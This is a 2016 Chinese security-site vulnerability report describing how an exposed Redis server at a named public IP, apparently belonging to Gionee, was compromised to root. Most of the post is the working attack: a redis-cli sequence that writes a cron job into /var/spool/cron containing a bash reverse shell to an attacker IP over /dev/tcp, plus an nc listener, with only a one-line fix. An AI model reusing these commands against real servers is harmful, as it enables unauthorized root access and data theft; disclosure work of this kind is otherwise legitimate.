频道栏目
首页 > 安全 > 企业安全 > 正文

金立某处Redis配置不当已获取主机root权限

2016-07-11 09:02:13           
收藏   我要投稿

。。。

这儿存在 redis未授权访问 42.121.237.23

 

屏幕快照 2016-05-25 14.30.18.png

 

利用方式不需要猜 web路径,写到cron里面

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xxx.xxx.xx.120/2333 0>&1\n\n"|redis-cli -h 42.121.237.23 -x set 1

redis-cli -h 42.121.237.23

42.121.237.23:6379> config set dir /var/spool/cron

OK

42.121.237.23:6379> config set dbfilename root

OK

42.121.237.23:6379> save

OK

然后本机nc -lvv 2333

一会儿shell就弹回来了。

 

屏幕快照 2016-05-25 14.44.36.png

 

这个uid.sql有意思啊

 

屏幕快照 2016-05-25 14.45.07.png

 

解决方案:

禁止外部访问

相关TAG标签 权限 主机 金立
上一篇:保险安全之复星保德信商城系统st2命令执行(泄露大量系统文件信息/危害内网安全)
下一篇:天音通信内网小漫游+注入(影响百万货运资料)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站